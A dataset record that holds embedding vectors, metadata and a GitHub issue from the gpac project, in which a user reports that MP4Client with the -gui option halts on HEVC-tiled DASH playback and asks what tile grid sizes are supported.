-0.002101898891851306, -0.010729918256402016, 0.006537928711622953, -0.011973737739026546, 0.013949680142104626, 0.009856094606220722, 0.014894354157149792, -0.003999118227511644, 0.005152407567948103, -0.011383317410945892, -0.007085052318871021, -0.006683565676212311, 0.010816512629389763, 0.0038298643194139004, 0.014374783262610435, -0.004286456387490034, 0.011753314174711704, -0.0029068393632769585, -0.009738010354340076, 0.011706080287694931, -0.02627767063677311, -0.014280316419899464, -0.020436439663171768, -0.014351166784763336, 0.004534433130174875, 0.018531346693634987, 0.002920615952461958, -0.018657304346561432, 0.010170985944569111, 0.010131624527275562, -0.005364959128201008, -0.014484995044767857, -0.012879050336778164, 0.023034291341900826, 0.018011776730418205, -0.0025762037839740515, -0.000401486293412745, 0.019350064918398857, -0.002568331314250827, 0.004306137096136808, 0.0008280654437839985, 0.004991025663912296, 0.026198947802186012, 0.001058821682818234, 0.01480775885283947, -0.00468007056042552, -0.008124193176627159, 0.0053452784195542336, 0.012768838554620743, 0.0153430737555027, 0.027710426598787308, 0.0032236988190561533, -0.0021294518373906612, 0.006439525168389082, 0.011580124497413635, -0.019224107265472412, 0.04436817020177841, -0.01035992056131363, 0.0010991671588271856, -0.018814750015735626, 0.00020000511722173542, -0.009777371771633625, -0.014925843104720116, 0.004317945800721645, -0.016626255586743355, 0.02711213193833828, -0.004589539486914873, 0.020294738933444023, -0.0041093300096690655, -0.007403879426419735, 0.01757092960178852, 0.0026175330858677626, 0.019397297874093056, -0.013516704551875591, 0.026419371366500854, 0.017665397375822067, -0.003493324387818575, -0.010997575707733631, 0.013430110178887844, 0.021837705746293068, 0.009848222136497498, 0.009580564685165882, -0.010312686674296856, 0.0008875995990820229, 0.004349434748291969, 0.005266555584967136, 0.017492206767201424, 0.0061876121908426285, -0.0022337595000863075, 0.005778253544121981, 0.008974399417638779, 0.0068292031064629555, 0.0016266098245978355, 0.012438202276825905, 0.01382372435182333, 0.018830494955182076, 0.0029619454871863127, -0.02682873047888279, 0.013044368475675583, -0.016153918579220772, -0.005412192549556494, -0.019397297874093056, -0.003209922229871154, 0.016689233481884003, 0.014193721115589142, -0.004172308370471001, 0.0017151730135083199, 0.019161129370331764, -0.015697326511144638, -0.02460874803364277, 0.014028402976691723, 0.003902682801708579, 0.017256038263440132, 0.01955474354326725, -0.018830494955182076, 0.009438863955438137, -0.01730327121913433, -0.005793998017907143, 0.03303208574652672 ]
1,682
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
Thanks for the fix for my problems before. Now I want to use the - gui command with MP4Client for 10x10 hevc-tiled dash contents. My command is Mp4client .\dash_tiled.mpd -logs=all@info:dash@debug -gui But it will stop after the following messags. ![image](https://user-images.githubusercontent.com/18127960/120890610-8792a380-c636-11eb-9103-ebe139ecde7a.png) By the way, how much tiles of the column and row can I use in hevc-tiled dash contents? I need a lot of tiles for my research. Thanks.
MP4Client with gui command failed to playback 8x8 hevc-tiled dash contents
https://api.github.com/repos/gpac/gpac/issues/1820/comments
1
2021-06-03T17:03:07
2021-06-07T11:57:30Z
https://github.com/gpac/gpac/issues/1820
910,690,291
1,820
false
This is a GitHub Issue repo:gpac owner:gpac Title : MP4Client with gui command failed to playback 8x8 hevc-tiled dash contents Issue date: --- start body --- Thanks for the fix for my problems before. Now I want to use the - gui command with MP4Client for 10x10 hevc-tiled dash contents. My command is Mp4client .\dash_tiled.mpd -logs=all@info:dash@debug -gui But it will stop after the following messags. ![image](https://user-images.githubusercontent.com/18127960/120890610-8792a380-c636-11eb-9103-ebe139ecde7a.png) By the way, how much tiles of the column and row can I use in hevc-tiled dash contents? I need a lot of tiles for my research. Thanks. --- end body ---
691
[ -0.03313952311873436, 0.04031764343380928, -0.02436450682580471, -0.007723595947027206, 0.01649070717394352, 0.015597394667565823, -0.02689424157142639, 0.07133851200342178, -0.006138558965176344, 0.004193825647234917, -0.029076136648654938, -0.028301404789090157, 0.02055409364402294, 0.0073994738049805164, -0.005083185620605946, 0.011676305904984474, -0.007782886736094952, 0.003755074692890048, -0.040286023169755936, 0.019352469593286514, 0.04711630567908287, -0.020190443843603134, -0.016617193818092346, 0.020506661385297775, 0.017534222453832626, 0.0015988713130354881, -0.012506375089287758, 0.0010138702346011996, -0.02657802402973175, 0.012364077381789684, -0.010972723364830017, 0.03978007659316063, 0.014498541131615639, 0.026388293132185936, 0.06849256157875061, -0.009723667055368423, 0.05309280380606651, 0.030435869470238686, 0.006996297277510166, 0.006822377908974886, -0.013526174239814281, -0.0007969652069732547, -0.0326651968061924, 0.019589632749557495, -0.013581512495875359, -0.015747597441077232, 0.009209814481437206, -0.005415213294327259, -0.003227388020604849, -0.014411581680178642, 0.009209814481437206, -0.013541985303163528, -0.028680866584181786, -0.006438964977860451, -0.014348338358104229, -0.052966319024562836, 0.045851439237594604, 0.018435440957546234, -0.0002860774111468345, 0.03557439148426056, -0.014498541131615639, -0.0186251699924469, -0.009794816374778748, 0.042183324694633484, -0.001348862424492836, 0.004683961626142263, -0.00454166391864419, 0.021028418093919754, -0.014783136546611786, 0.006099031772464514, 0.008727584034204483, -0.011391711421310902, 0.014704082161188126, 0.020601525902748108, 0.015360232442617416, -0.0664055347442627, 0.03873655945062637, -0.016316788271069527, -0.011747455224394798, 0.019431523978710175, -0.05299793928861618, 0.014822663739323616, -0.09094395488500595, 0.0236055850982666, 0.019194360822439194, -0.012253401800990105, -0.03848358616232872, -0.0652671530842781, -0.04939306899905205, 0.0012026120675727725, -0.02161341905593872, 0.032032765448093414, 0.0156527329236269, -0.014498541131615639, 0.013186241500079632, -0.004707677755504847, -0.02635667286813259, 0.013763337396085262, -0.029265867546200752, -0.03987494111061096, -0.007166263647377491, 0.0005756134050898254, 0.0028578094206750393, -0.03740844875574112, 0.04389089345932007, 0.00553774693980813, 0.029297487810254097, -0.033107902854681015, -0.001236210111528635, 0.06558337062597275, 0.012277117930352688, -0.003917135763913393, 0.0000025051845113921445, 0.002355815377086401, -0.02496531791985035, 0.02536058984696865, -0.036301691085100174, -0.018150845542550087, -0.02313126064836979, -0.02229328639805317, 0.015470908023416996, -0.02635667286813259, -0.04145602509379387, 0.002041574800387025, -0.031036680564284325, 0.05865821987390518, -0.017692331224679947, -0.01061697956174612, 0.011367994360625744, -0.05521145835518837, -0.029265867546200752, -0.010111032985150814, -0.02290990948677063, -0.004521900322288275, 0.03192208707332611, 0.013707999140024185, -0.033107902854681015, 0.007806602865457535, 0.004300548695027828, 0.011779076419770718, -0.03260195255279541, -0.03247546777129173, 0.046547114849090576, -0.009992451407015324, -0.03160586953163147, 0.014340433292090893, 0.012711916118860245, 0.01824571006000042, -0.02458585798740387, 0.06507742404937744, -0.03200114145874977, -0.005138523411005735, -0.008059576153755188, -0.007446906063705683, 0.01603219285607338, 0.018751656636595726, -0.0236055850982666, 0.016127057373523712, -0.03329763188958168, -0.034246280789375305, 0.006933053955435753, -0.0056009902618825436, -0.00435193395242095, 0.008996368385851383, -0.00988968089222908, -0.008925219997763634, 0.006573357153683901, 0.02123395912349224, -0.011755360290408134, 0.009842248633503914, -0.007494338788092136, -0.007913325913250446, 0.03276006132364273, 0.028665054589509964, -0.029139380902051926, -0.026704510673880577, 0.004189873114228249, 0.005553558003157377, -0.019652875140309334, 0.00513457041233778, -0.048918742686510086, -0.011367994360625744, 0.0051582870073616505, 0.01992166042327881, 0.04132954031229019, -0.03449925407767296, 0.02542383223772049, -0.0426260270178318, 0.03147938475012779, -0.004652339965105057, 0.030799519270658493, 0.04420711100101471, -0.017138952389359474, -0.028364649042487144, 0.007755217608064413, -0.021739905700087547, -0.022783422842621803, -0.018814900889992714, 0.025629373267292976, 0.007624777965247631, -0.004648387432098389, -0.015818746760487556, 0.00746271712705493, -0.026973294094204903, -0.0348154716193676, 0.04284738004207611, 0.005407307762652636, 0.03108411282300949, 0.025787482038140297, -0.0426260270178318, -0.038135748356580734, -0.04626252129673958, 0.037914395332336426, -0.010972723364830017, -0.04253116250038147, 0.02735275588929653, -0.007067446131259203, 0.013249484822154045, -0.007039777003228664, -0.016696248203516006, 0.053567130118608475, -0.02351072058081627, -0.001557367853820324, 0.011739549227058887, -0.018957197666168213, -0.005553558003157377, 0.038989532738924026, -0.028285594657063484, -0.03361384943127632, -0.012862118892371655, -0.016048002988100052, -0.007636636029928923, -0.009288868866860867, 0.02159760892391205, 0.00890150386840105, -0.0057116663083434105, 0.007806602865457535, -0.021961258724331856, -0.004114771261811256, 0.02251463755965233, -0.023858558386564255, 0.04559846594929695, -0.024680722504854202, 0.020822877064347267, 0.001262890873476863, 0.04733765870332718, 0.007150453049689531, -0.015723882243037224, -0.0038716797716915607, -0.03323438763618469, -0.026451537385582924, -0.019415711984038353, 0.014972866512835026, 0.01939990185201168, 0.02352653071284294, 0.045693330466747284, 0.04446008428931236, -0.003891443368047476, 0.013383876532316208, -0.052650101482868195, 0.016087530180811882, 0.007067446131259203, -0.03573250025510788, -0.04193035140633583, -0.000010005297554016579, -0.013478741981089115, -0.01946314610540867, -0.008091198280453682, 0.004300548695027828, -0.015296989120543003, -0.00444679893553257, -0.02177152782678604, -0.010134749114513397, -0.011565630324184895, -0.02749505266547203, -0.014213945716619492, -0.005656328517943621, -0.013850296847522259, 0.020332742482423782, -0.027668971568346024, -0.002490207552909851, 0.01157353539019823, 0.01176326535642147, 0.02305220626294613, -0.03185884654521942, 0.006316430866718292, 0.004766968544572592, 0.013360160402953625, -0.045408736914396286, -0.001856785616837442, 0.0077433595433831215, 0.03614358231425285, -0.006739370990544558, -0.00038415403105318546, 0.013122998178005219, 0.010134749114513397, -0.012142726220190525, 0.014253472909331322, 0.03620682656764984, -0.02627761848270893, -0.06109308823943138, 0.05002550035715103, 0.0034625742118805647, -0.031495194882154465, -0.04193035140633583, -0.024759776890277863, -0.025392210111021996, 0.025028562173247337, -0.020680580288171768, 0.014245567843317986, 0.04335332661867142, -0.012988605536520481, -0.02558194100856781, 0.011067588813602924, -0.020127201452851295, -0.011945090256631374, 0.013368066400289536, 0.006774945184588432, -0.039811696857213974, 0.005521936342120171, 0.01778719574213028, -0.0003905771882273257, -0.048602525144815445, -0.011881846934556961, 0.015281178057193756, -0.003243198851123452, -0.04863414540886879, -0.001898289076052606, -0.05214415490627289, 0.01377914845943451, 0.018735846504569054, -0.004146392922848463, 0.006723560392856598, -0.019352469593286514, 0.0010217756498605013, -0.047527387738227844, -0.02169247344136238, -0.024079911410808563, 0.004375650081783533, 0.021502744406461716, -0.018498683348298073, -0.024917885661125183, 0.03185884654521942, -0.019131118431687355, -0.026451537385582924, -0.02755829691886902, -0.007075351197272539, 0.0037017131689935923, 0.0453454926609993, 0.0052373409271240234, 0.0009521091124042869, 0.028301404789090157, 0.002405224135145545, 0.026910051703453064, 0.013486647047102451, -0.015210028737783432, -0.007660352624952793, -0.01772395335137844, 0.023305179551243782, -0.01446691993623972, 0.018498683348298073, -0.04882387816905975, 0.0067354184575378895, 0.03177979215979576, 0.01203204970806837, 0.006099031772464514, -0.023004774004220963, -0.02970856986939907, -0.016395842656493187, -0.027447620406746864, 0.013937256298959255, 0.010443060658872128, -0.045250628143548965, 0.04202521592378616, -0.047685496509075165, -0.010775088332593441, 0.004735346883535385, -0.030483301728963852, -0.050974152982234955, -0.01003988366574049, -0.05385172367095947, 0.01772395335137844, 0.005340111441910267, -0.042278189212083817, -0.0025494981091469526, 0.030293570831418037, 0.02115490473806858, -0.035384662449359894, -0.008229542523622513, -0.011478670872747898, -0.02381112612783909, -0.004691867157816887, -0.04297386482357979, -0.02747924253344536, -0.015470908023416996, 0.019146928563714027, -0.035922229290008545, -0.019558010622859, 0.0178030077368021, -0.039052776992321014, 0.01626935601234436, -0.009407450444996357, 0.007723595947027206, 0.04901360720396042, -0.0010810662060976028, -0.00040787027683109045, -0.028064243495464325, 0.030514923855662346, 0.0011739549227058887, -0.012877929955720901, 0.013020227663218975, -0.027163024991750717, -0.02902870438992977, -0.029819246381521225, 0.032570332288742065, 0.019052064046263695, 0.03285492956638336, -0.0038598214741796255, -0.03147938475012779, 0.02626180648803711, -0.00255937990732491, 0.014316716231405735, -0.009375828318297863, -0.02749505266547203, 0.020253688097000122, 0.01092529110610485, 0.004146392922848463, 0.0047195362858474255, 0.01832476444542408, -0.035163309425115585, 0.03468898683786392, -0.020569903776049614, -0.0407603494822979, -0.03576412424445152, 0.0009530972456559539, -0.0028439750894904137, -0.040507376194000244, 0.003964568488299847, -0.02199288085103035, 0.00732832495123148, -0.06710121035575867, -0.004802543204277754, 0.017692331224679947, 0.005857916548848152, 0.002674008486792445, 0.0053875441662967205, -0.053725238889455795, -0.028459513559937477, -0.01925760507583618, -0.013802864588797092, 0.000354261661414057, 0.00828488077968359, -0.014324622228741646, -0.04999388009309769, -0.005197814200073481, 0.004869739059358835, -0.05049982666969299, -0.006901432294398546, 0.02283085510134697, -0.005976498126983643, -0.01663300395011902, 0.023842748254537582, -0.00008628025534562767, -0.00966042373329401, 0.0184828732162714, 0.0008399509242735803, -0.02199288085103035, -0.02007976733148098, 0.015747597441077232, -0.011415427550673485, 0.00932049099355936, 0.00045826734276488423, 0.0118027925491333, -0.009945019148290157, -0.016474897041916847, -0.012348267249763012, -0.015083542093634605, -0.032175060361623764, 0.03949547931551933, -0.01917855069041252, -0.004229399841278791, -0.034183040261268616, 0.013352255336940289, 0.015905706211924553, 0.0020771492272615433, -0.009771100245416164, 0.03032519295811653, -0.035922229290008545, -0.023178692907094955, 0.012277117930352688, 0.026751942932605743, 0.012198063544929028, 0.01671205833554268, -0.005735382437705994, 0.003438857849687338, 0.0184828732162714, 0.005980450659990311, -0.010988534428179264, 0.00765244709327817, 0.016285166144371033, 0.005952781531959772, 0.012601240538060665, 0.017739763483405113, -0.003041610587388277, 0.043416570872068405, -0.013162525370717049, 0.007656399626284838, 0.025392210111021996, -0.04170899838209152, 0.0014654673868790269, -0.011810698546469212, -0.022182609885931015, -0.010735561139881611, -0.010751372203230858, -0.0100477896630764, -0.052428748458623886, -0.0026700557209551334, -0.011178264394402504, 0.03892629221081734, -0.0012678317725658417, -0.03582736477255821, -0.006857952103018761, -0.0029605799354612827, 0.01778719574213028, -0.010221708565950394, -0.007197885308414698, -0.017692331224679947, -0.025834914296865463, 0.0008384686661884189, -0.02390599250793457, -0.044175490736961365, -0.03046749159693718, 0.013115093111991882, 0.02839627116918564, -0.020506661385297775, 0.031337086111307144, -0.026672888547182083, -0.00032214587554335594, 0.03491033613681793, 0.01687016710639, -0.024570047855377197, 0.014245567843317986, -0.023621397092938423, -0.002011929638683796, -0.011099210008978844, 0.00885407067835331, -0.020569903776049614, 0.0003661197843030095, 0.0037926253862679005, -0.011620968580245972, 0.03383519873023033, -0.03326600790023804, 0.024696534499526024, 0.016300976276397705, 0.018451251089572906, 0.0035791790578514338, 0.019589632749557495, 0.014561784453690052, 0.017850439995527267, 0.009067517705261707, 0.00812677200883627, 0.03068884275853634, 0.02015882171690464, 0.018957197666168213, -0.013502458110451698, 0.004968556575477123, -0.016316788271069527, 0.024317072704434395, -0.017897872254252434, -0.0030712559819221497, 0.0069449120201170444, -0.010862047784030437, 0.008427178487181664, 0.012205969542264938, 0.0005459681269712746, 0.005395449697971344, 0.012664483860135078, 0.009004274383187294, 0.00015242639346979558, 0.001628516591154039, 0.0467052236199379, -0.011241507716476917, 0.015897801145911217, 0.022862475365400314, 0.02123395912349224, -0.028807353228330612, 0.01724962703883648, 0.002610765164718032, -0.033455740660429, -0.029961543157696724, 0.012190158478915691, 0.025155048817396164, 0.02205612324178219, -0.009897586889564991, 0.024238020181655884, -0.024380316957831383, 0.024490993469953537, 0.03892629221081734, 0.022166799753904343, 0.001987225143238902, -0.040127914398908615, 0.061820387840270996, -0.022166799753904343, -0.018419628962874413, -0.031890466809272766, -0.0016887955134734511, 0.007134641986340284, 0.021170716732740402, -0.019225982949137688, 0.03260195255279541, -0.010245424695312977, 0.03731358423829079, 0.045060895383358, -0.012435226701200008, 0.014688271097838879, -0.0018281284719705582, 0.010877858847379684, 0.011565630324184895, -0.012024144642055035, -0.003322253003716469, 0.03411979600787163, -0.04224656894803047, 0.0345308780670166, -0.029582083225250244, 0.025091804563999176, 0.028665054589509964, -0.006016024854034185, -0.02314707078039646, 0.0008320455090142787, -0.023479098454117775, -0.009707855992019176, 0.01702827587723732, -0.0061504170298576355, -0.018388008698821068, -0.022403961047530174, -0.015170501545071602, 0.022103555500507355, -0.01984260603785515, 0.009952924214303493, -0.01542347576469183, -0.018514495342969894, 0.0007006179075688124, -0.025850724428892136, 0.03642817959189415, -0.012838402763009071, 0.014632933773100376, 0.011605157516896725, 0.012308740057051182, 0.01718638464808464, 0.02145531214773655, -0.010063600726425648, -0.019494766369462013, 0.021202336996793747, 0.0063796741887927055, 0.023083828389644623, -0.021518554538488388, 0.013874012976884842, 0.036459799855947495, -0.005743287969380617, 0.0022728084586560726, -0.037534937262535095, -0.018372196704149246, 0.01818246766924858, -0.027131402865052223, 0.018372196704149246, 0.022846665233373642, -0.003861797973513603, -0.033487360924482346, -0.010095221921801567, 0.035479526966810226, 0.019067874178290367, -0.0021858487743884325, 0.028285594657063484, 0.013043943792581558, 0.0029625564347952604, -0.007352041080594063, -0.0037926253862679005, -0.01103596668690443, 0.01878327876329422, 0.011462859809398651, -0.000001852832951954042, 0.004695819690823555, -0.011692116968333721, 0.008237448520958424, -0.02542383223772049, 0.010909480042755604, -0.00686981063336134, 0.007359946612268686, 0.005004131235182285, -0.005644470453262329, 0.06779688596725464, 0.0380408838391304, 0.005095043685287237, 0.03930575028061867, -0.013652660883963108, -0.010664412751793861, 0.021107472479343414, -0.0066207898780703545, -0.0024328932631760836, -0.029186813160777092, -0.019067874178290367, 0.02550288662314415, -0.006355958059430122, -0.01908368431031704, 0.003413165220990777, 0.0007860952755436301, -0.00908332783728838, 0.005691902711987495, -0.021708285436034203, 0.002612741431221366, 0.019052064046263695, -0.017739763483405113, 0.020111389458179474, 0.03288654983043671, -0.051574964076280594, -0.009692045859992504, -0.012514281086623669, -0.0315900593996048, -0.026910051703453064, 0.01130475103855133, 0.017154762521386147, -0.007889609783887863, -0.012103199027478695, 0.009296774864196777, -0.0044863261282444, 0.004644434433430433, -0.000802400172688067, 0.007375757209956646, 0.013186241500079632, 0.011589346453547478, -0.030593978241086006, -0.019953280687332153, 0.012419415637850761, 0.021423690021038055, -0.0372503399848938, -0.0017105353763327003, -0.009225625544786453, 0.014387865550816059, 0.018119223415851593, 0.026214374229311943, 0.0026443630922585726, -0.00890150386840105, -0.0031226410064846277, -0.010956913232803345, 0.00954184215515852, -0.01879909075796604, -0.005889538209885359, 0.004652339965105057, 0.01832476444542408, -0.018008548766374588, 0.03525817394256592, 0.005529841873794794, 0.034246280789375305, -0.03658628463745117, -0.0081662992015481, 0.013202052563428879, 0.03465736284852028, 0.003889466868713498, -0.019352469593286514, -0.025692617520689964, 0.008142583072185516, 0.025708427652716637, -0.039368994534015656, 0.004597002174705267, -0.01642746478319168, -0.020712202414870262, 0.015352326445281506, 0.00812677200883627, 0.014047931879758835, -0.03566925600171089, -0.031210599467158318, 0.014775230549275875, -0.013439214788377285, -0.007067446131259203, 0.020728012546896935, -0.025455454364418983, -0.017044086009263992, 0.02841208130121231, -0.03396168723702431, -0.01634841039776802, -0.030641410499811172, -0.026451537385582924, -0.031732358038425446, 0.029819246381521225, -0.007020013406872749, -0.04025440290570259, 0.022356528788805008, -0.004419130273163319, 0.01473570428788662, 0.0030969486106187105, 0.03015127405524254, -0.016237733885645866, 0.02321031503379345, -0.024617480114102364, 0.005929065402597189, -0.029518840834498405, 0.007379710208624601, -0.0023617444094270468, 0.009676234796643257, 0.0026700557209551334, 0.03100505843758583, 0.001507958979345858, -0.005332206375896931, -0.020443417131900787, -0.022435583174228668, -0.001945721684023738, -0.013328539207577705, -0.008988463319838047, -0.040127914398908615, 0.03984332084655762, -0.01176326535642147, -0.015502529218792915, 0.01710733026266098, -0.009217720478773117, 0.02747924253344536, 0.014150702394545078, 0.008838260546326637, -0.027020728215575218, -0.02649896964430809, 0.033013034611940384, -0.022119367495179176, 0.022166799753904343, -0.0017974949441850185, -0.01553415134549141, -0.02038017474114895, -0.021139094606041908, -0.001100829802453518, 0.015241650864481926, 0.022641124203801155, 0.005427071359008551, -0.004427035339176655, 0.007699879817664623, -0.048981986939907074, 0.008387651294469833, -0.019874226301908493, 0.028427891433238983, -0.017976926639676094, -0.007067446131259203, -0.0031740262638777494, 0.017739763483405113, -0.02305220626294613, 0.012862118892371655, -0.023779505863785744, -0.014300906099379063, -0.0008088233298622072, -0.014775230549275875, -0.0026759847532957792, -0.038673318922519684, 0.0028736202511936426, 0.002470443956553936, 0.017091520130634308, 0.02932910993695259, 0.0313054658472538, 0.014024215750396252, -0.01577131450176239, 0.003662185976281762, -0.010435154661536217, 0.025977211073040962, 0.028000999242067337, -0.013628944754600525, 0.010964818298816681, -0.010877858847379684, -0.035479526966810226, -0.008498326875269413, 0.0013775195693597198, -0.02864924445748329, 0.0038044836837798357, -0.03320276737213135, -0.02352653071284294, 0.011723739095032215, -0.015629015862941742, -0.025613563135266304, 0.021898014470934868, -0.02490207552909851, -0.03873655945062637, 0.002452656626701355, -0.04496603086590767, 0.016917599365115166, -0.03503682464361191, 0.0028439750894904137, -0.007241365034133196, -0.025834914296865463, -0.014221851713955402, 0.0017994713271036744, 0.019052064046263695, -0.02749505266547203, -0.0010662436252459884, -0.02344747819006443, -0.01826152205467224, 0.004118724260479212, -0.00036686091334559023, 0.00017750139522831887, -0.010680222883820534, -0.016158679500222206, 0.005355922505259514, 0.022783422842621803, -0.008537854067981243, -0.03313952311873436, -0.014743609353899956, -0.023384233936667442, -0.01671205833554268, -0.022498827427625656, 0.0026937720831483603, -0.014854284934699535, -0.001238186494447291, -0.015107258222997189, 0.012356172315776348, 0.007972616702318192, -0.001669031917117536, -0.013051848858594894, 0.012371983379125595, -0.009415355511009693, 0.0038361053448170424, -0.004033740609884262, -0.04518738389015198, -0.02572423778474331, -0.05192280188202858, -0.01764489896595478, 0.004664198029786348, 0.037060610949993134, 0.003389449091628194, -0.003162168199196458, -0.001898289076052606, 0.01947895623743534, -0.018909765407443047, -0.025929778814315796, -0.02542383223772049, 0.012490564025938511, -0.016063814982771873, -0.00503970542922616, -0.0007702843868173659, 0.0022273522336035967, 0.0035218647681176662, -0.0073836627416312695, 0.01396887842565775, -0.03690250217914581, -0.009526032023131847, 0.0024072006344795227, 0.0005079232505522668, -0.017929494380950928, 0.01575550250709057, 0.001853821100667119, 0.0016848427476361394, -0.0036700915079563856, 0.010830426588654518, 0.019052064046263695, -0.0095102209597826, 0.015146785415709019, -0.03054654411971569, -0.03342411667108536, -0.014245567843317986, -0.0046879141591489315, -0.021281391382217407, -0.004419130273163319, -0.0004928535781800747, -0.014680366031825542, -0.026214374229311943, -0.004968556575477123, 0.021518554538488388, -0.005980450659990311, -0.020269498229026794, 0.006407343316823244, -0.013929351232945919, 0.0009891657391563058, -0.009367923252284527, 0.0007747312192805111, -0.0034408343490213156, 0.00882244948297739, -0.00456538051366806, -0.029661137610673904, 0.013874012976884842, -0.012838402763009071, 0.0012648672563955188, -0.0045930491760373116, -0.0009432155056856573, 0.02466491237282753, -0.01770814135670662, -0.018150845542550087, -0.021866392344236374, -0.025297345593571663, -0.0011156524997204542, -0.02093355357646942, 0.026546401903033257, -0.03380357846617699, -0.001987225143238902, 0.005012036766856909, 0.009557653218507767, 0.006557546555995941, 0.017976926639676094, -0.0009456859552301466, -0.0016443274216726422, -0.0034941958729177713, 0.02833302691578865, -0.03437276929616928, 0.0545157790184021, 0.008727584034204483, 0.023558152839541435, -0.0013597323559224606, 0.005668186582624912, -0.034246280789375305, -0.034467633813619614, -0.01856192760169506, 0.008075387217104435, -0.003996190149337053, 0.00958927534520626, -0.0014970890479162335, 0.016364220529794693, 0.027431808412075043, -0.006727512925863266, 0.006059505045413971, -0.03140033036470413, 0.006371769122779369, -0.009573464281857014, 0.006703796796500683, -0.007549676578491926, 0.03282330557703972, -0.03260195255279541, 0.00037229590816423297, -0.0076287309639155865, 0.02779545821249485, -0.006699843797832727, 0.02344747819006443, -0.0007767075439915061, -0.0029684854671359062, 0.005008083768188953, 0.017502600327134132, -0.03611196205019951, -0.020569903776049614, 0.016585571691393852, 0.01947895623743534, 0.01461712270975113, 0.007454811595380306, 0.0030850903131067753, 0.02665707841515541, -0.012308740057051182, -0.03864169493317604, -0.013510364107787609, -0.024032479152083397, -0.008885692805051804, 0.007933089509606361, 0.02849113568663597, -0.005925112869590521, -0.03040424734354019, -0.02452261373400688, 0.002998130628839135, -0.00458119111135602, 0.010190087370574474, 0.01947895623743534, -0.006257140543311834, 0.009636707603931427, 0.011526103131473064, 0.010569547303020954, 0.06684823334217072, -0.005245246458798647, -0.0066247424110770226, -0.009194004349410534, -0.0029427928384393454, 0.004442846402525902, 0.012198063544929028, -0.011367994360625744, 0.005122712347656488, -0.04167737811803818, 0.015700165182352066, -0.009486504830420017, -0.029202623292803764, -0.027621539309620857, -0.012205969542264938, 0.0027589916717261076, -0.02213517762720585, 0.007695926818996668, 0.020206253975629807, -0.006960722617805004, -0.003268891479820013, 0.0074034263379871845, 0.037155475467443466, -0.012451037764549255, 0.003990260884165764, -0.014047931879758835, -0.020648958161473274, 0.011462859809398651, 0.0006887597846798599, -0.022656934335827827, -0.01034819521009922, 0.021202336996793747, -0.028459513559937477, 0.011810698546469212, -0.005553558003157377, -0.0031463573686778545, 0.012142726220190525, -0.013178336434066296, -0.024475181475281715, -0.03943223878741264, -0.027858702465891838, 0.006352005526423454, -0.01694922149181366, 0.010996440425515175, -0.0007366864010691643, 0.08164718002080917, 0.029060326516628265, -0.01469617709517479, -0.020980985835194588, -0.04085521399974823, -0.028744108974933624, -3.782867281643121e-7, 0.006585215218365192, 0.029661137610673904, -0.0017559914849698544, 0.04082359001040459, 0.0074231899343431, -0.011518198065459728, -0.003956662956625223, -0.010490492917597294, -0.006901432294398546, 0.012364077381789684, -0.013676377944648266, 0.006656364072114229, 0.01864098198711872, -0.004146392922848463, 0.028965460136532784, 0.018577737733721733, -0.007798697333782911, 0.00817420519888401, -0.029613705351948738, -0.005707713775336742, -0.015621110796928406, -0.01947895623743534, -0.008798733353614807, -0.01396887842565775, 0.003612777218222618, 0.000686783401761204, -0.0032787732779979706, -0.0008888657321222126, -0.0013864131178706884, 0.004743252415210009, -0.005636564921587706, 0.005462645553052425, -0.022277474403381348, -0.005514030810445547, -0.006012072321027517, 0.018150845542550087, -0.010972723364830017, 0.007711737882345915, -0.020443417131900787, 0.03163749352097511, -0.00981853250414133, -0.010775088332593441, -0.014854284934699535, -0.009383734315633774, -0.012711916118860245, 0.01818246766924858, 0.03361384943127632, 0.0006462681340053678, 0.00008170993532985449, 0.0028103769291192293, -0.007355993613600731, 0.027463430538773537, -0.044396840035915375, 0.030530733987689018, 0.018071791157126427, 0.01588989607989788, 0.011225697584450245, 0.014680366031825542, -0.0017490743193775415, -0.010972723364830017, 0.018071791157126427, -0.006897479295730591, 0.017550034448504448, 0.017075708135962486, -0.012379888445138931, 0.0013706022873520851, -0.012182253412902355, -0.013439214788377285, 0.04129791632294655, -0.011873941868543625, 0.02283085510134697, -0.019225982949137688, -0.011328467167913914, 0.013621039688587189, 0.026056265458464622, 0.00014859720249660313, -0.0006937006255611777, -0.018198277801275253, 0.026483159512281418, 0.0016799018485471606, -0.005699808243662119, -0.0022372340317815542, 0.0017055944772437215, -0.011352184228599072, -0.02464910037815571, 0.014996582642197609, 0.0071385945193469524, -0.020791256800293922, 0.004652339965105057, 0.002838046057149768, -0.016585571691393852, -0.015739692375063896, -0.002490207552909851, 0.0020475038327276707, -0.000015579236787743866, 0.022419773042201996, 0.00890150386840105, -0.010174276307225227, 0.014854284934699535, 0.016206111758947372, 0.01625354401767254, 0.02045922912657261, -0.026245996356010437, -0.03468898683786392, -0.010822520591318607, 0.025993023067712784, -0.009652518667280674, -0.021186526864767075, -0.009328396059572697, -0.012917457148432732, -0.0067551820538938046, 0.0014219875447452068, -0.017976926639676094, -0.03513168916106224, -0.0010860071051865816, 0.022198420017957687, -0.04300548881292343, 0.017044086009263992, 0.007205790840089321, -0.015937328338623047, -0.03329763188958168, 0.03838872164487839, 0.002055409364402294, 0.044554948806762695, 0.004992273170500994, -0.003047539619728923, -0.0031463573686778545, 0.035384662449359894, -0.00855366513133049, -0.00866434071213007, -0.007573392707854509, 0.005328253377228975, -0.003978402819484472, -0.014514352194964886, 0.030056409537792206, 0.018150845542550087, 0.02352653071284294, 0.021471122279763222, -0.010000357404351234, 0.016522329300642014, 0.018751656636595726, 0.009114949963986874, -0.0064943027682602406, -0.005284773651510477, 0.008996368385851383, 0.014411581680178642, 0.0015889895148575306, 0.006573357153683901, 0.01939990185201168, 0.02314707078039646, 0.004502137191593647, 0.002998130628839135, 0.006450823042541742, 0.0018745728302747011, 0.019368279725313187, -0.0031937898602336645, -0.000663067155983299, -0.013534080237150192, 0.007439000532031059, 0.009027990512549877, -0.03794601932168007, -0.011976712383329868, -0.014261378906667233, 0.02099679782986641, 0.006336194463074207, -0.02755829691886902, -0.0027787552680820227, 0.02510761469602585, 0.03465736284852028, -0.03155843913555145, -0.024949507787823677, -0.01762908697128296, -0.007703832350671291, -0.009217720478773117, 0.0044863261282444, -0.009288868866860867, -0.007636636029928923, 0.02735275588929653, -0.02695748396217823, 0.037914395332336426, -0.013415498659014702, -0.041582513600587845, 0.01656976155936718, 0.0011146642500534654, 0.019984902814030647, -0.00901217944920063, -0.01879909075796604, -0.007154405582696199, 0.0044942316599190235, 0.009992451407015324, 0.003930970560759306, -0.003116711974143982, 0.023684639483690262, 0.008142583072185516, 0.007980521768331528, -0.007545724045485258, -0.018672604113817215, 